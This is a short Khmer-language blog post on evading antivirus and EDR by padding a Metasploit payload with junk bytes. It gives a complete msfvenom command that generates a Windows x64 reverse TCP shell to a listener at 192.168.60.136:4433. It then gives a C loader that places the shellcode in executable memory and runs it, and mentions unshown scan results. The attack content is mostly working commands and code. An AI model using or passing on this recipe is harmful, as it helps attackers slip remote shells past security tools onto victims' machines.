This page looks best with JavaScript enabled

Evading AV/EDR with Junk Bytes

 ·  β˜• 1 min read  ·  🐱 thik

αžαŸ’αž›αŸ‡αŸ—αž’αŸ†αž–αžΈαž€αžΆαžš Bypass AV/EDR αžαžΆαž˜αžšαž™αŸˆ Msfvenom αŸ”

Generate Payload

αžαžΆαž„αž€αŸ’αžšαŸ„αž˜αž‡αžΆαžŠαŸ†αžŽαžΎαžšαž€αžΆαžšαž”αž„αŸ’αž€αžΎαž Payload αžŠαŸ„αž™αž”αŸ’αžšαžΎαž”αŸ’αžšαžΆαžŸαŸ‹ Shellcode αž‡αžΆαž—αžΆαžŸαžΆαžš C αž‚αŸ„αž›αžŠαŸ…αž›αžΎαž˜αŸ‰αžΆαžŸαŸŠαžΈαž“ 64 bit αž“αž·αž„αž”αžΆαž“αžαŸ‚αž˜αž“αžΌαžœαž–αžΆαž€αŸ’αž™αž”αž‰αŸ’αž‡αžΆ -n αž€αŸ’αž“αž»αž„αž“αŸαž™αž”αž„αŸ’αž€αžΎαžαž…αŸ†αž“αž½αž“ Bytes αžŠαŸ‚αž›αž˜αž·αž“αž”αžΆαž“αž€αžΆαžšαžŠαžΎαž˜αŸ’αž”αžΈαž–αŸ’αž™αžΆαž™αžΆαž˜αž”αž„αŸ’αžœαŸ€αž„αž–αžΈαž€αžΆαžšαž…αžΆαž”αŸ‹αžšαž”αžŸαŸ‹ AV αŸ”

1
msfvenom -p windows/x64/shell_reverse_tcp lhost=192.168.60.136 lport=4433 -f c -n 10000

αž…αŸ†αžŽαžΆαŸ†αŸ– αž€αŸ’αžšαŸ„αž™ -n αž™αžΎαž„αž’αžΆαž…αžŠαžΆαž€αŸ‹αž…αŸ†αž“αž½αž“αž›αŸαžαž€αžΆαž“αŸ‹αžαŸ‚αž…αŸ’αžšαžΎαž“αž‚αžΊαž˜αžΆαž“αž›αž‘αŸ’αž’αž—αžΆαž–αž€αŸ’αž“αž»αž„αž€αžΆαžš Bypass αž”αžΆαž“αž€αžΆαž“αŸ‹αžαŸ‚αž…αŸ’αžšαžΎαž“ αŸ”

αž”αž“αŸ’αž‘αžΆαž”αŸ‹αž˜αž€αž™αžΎαž„αž“αžΉαž„ Compile Payload αž’αž˜αŸ’αž˜αžαžΆαžŠαŸ„αž™αž”αŸ’αžšαžΎαž”αŸ’αžšαžΆαžŸαŸ‹αžœαž·αž’αžΈαžŸαžΆαžŸαŸ’αžαŸ’αžš Process Injection αžαžΆαž˜αž”αŸ‚αž” Slef-Injection αžŠαŸ„αž™αž•αŸ’αžŠαž›αŸ‹αžŸαž·αž‘αŸ’αž’αžαžΆαž˜αž›αŸ†αž“αžΆαŸ†αžŠαžΎαž˜ Read, Write αž“αž·αž„ Execute αŸ”

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
#include <stdio.h>
#include <Windows.h>

int main()
{
    unsigned char shellcode[] =
		"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
		"\x52\x51\x56\x48\x31\xd2\[.....]\x8b\x52\x60\x48\x8b\x52"
		"\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb";

    void* exec = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    memcpy(exec, shellcode, sizeof shellcode);
    ((void(*)())exec)();

    return 0;
}

Scan Result

αžαžΆαž„αž€αŸ’αžšαŸ„αž˜αž‡αžΆαž›αž‘αŸ’αž’αž•αž›αž–αžΈαž€αžΆαžšαžŠαžΆαž€αŸ‹αž…αŸ†αž“αž½αž“ 1000 Bytes αŸ”

Scan Result 1

αžαžΆαž„αž€αŸ’αžšαŸ„αž˜αž‡αžΆαž›αž‘αŸ’αž’αž•αž›αž–αžΈαž€αžΆαžšαžŠαžΆαž€αŸ‹αž…αŸ†αž“αž½αž“ 10000* Bytes αŸ•

Scan Result 2

Share on

Thik
WRITTEN BY
thik
Security Researcher